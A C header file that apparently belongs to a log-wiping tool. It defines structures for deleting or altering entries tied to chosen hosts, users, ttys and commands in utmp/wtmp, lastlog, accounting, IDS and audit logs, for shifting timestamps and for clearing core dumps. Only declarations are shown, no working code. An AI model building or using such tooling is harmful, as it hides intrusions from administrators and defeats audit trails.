#include  <time.h>

#define BUFF_LONG	2048
#define BUFF_SHORT	 255

/* Logfile Types: 
 *               1      normal textfile
 *               2      logfile
 *               3      Utmp/Wtmp
 *               4      Utmpx/Wtmpx
 *               5      Lastlog
 *               6      Accounting
 *               7      other logfiles
 *               8      mod_security audit_log
 *               9      prelude.log
 *               10     prelude-xml.log
 *               11     samba logfile
 *               12     snort.alert logfile
 *               13     manually edit this file
 */




typedef struct Cleanme {
	char  name[BUFF_LONG]; 			/* File Name */
	char  searchstring[BUFF_SHORT];		/* string to delete */
	char  replacestring[BUFF_SHORT];	/* string to replace */	
	char  host[BUFF_SHORT];			/* host to clean */
	char  user[BUFF_SHORT];			/* user to clean */
	char  tty[BUFF_SHORT];			/* tty to clean */
	char  cmd[BUFF_SHORT];			/* command to clean (for acct)*/
	char  logto[BUFF_SHORT];		/* log to logfile || NULL no logging */
	char  crypt[BUFF_SHORT];		/* password for crypt logging || NULL cleartext */
	int   logtype;				/* type of logfile */
	int   compressed;			/* is this file compressed (which type)*/
	int   verbose;				/* verbose level */
	int   is_clean;				/* is clean now? 0=NO <0 =number of cleanings*/
	int   checked;				/* is already checked */
	int   was_clean;			/* did I change the file? */
	int   ignore;				/* ignore this file (.jpg or what ever) */
	int   clear_core;			/* clear coredumps? */
	time_t change_time; 			/* set new time */
	time_t delete_time; 			/* delete with THIS time */
	time_t from_time; 			/* entrys between from_time */
	time_t to_time; 			/* ...and to_time */
} clearMe;

/*
 * int compressed: 
 *    1  .gz
 *    2  .tgz
 *    3  .bzip2
 *    4  .tar
 *    5  .zip
 *    6  .rar
 *    
 *    At the moment these files are ignored!
 *
 *
 */


typedef struct Node {
	struct Cleanme *Log;
	struct Node	*prev; 
	struct Node	*next; 
} block_t;

typedef struct List_head {
	struct Node	*head;
	struct Node	*tail;
} block_head_t;


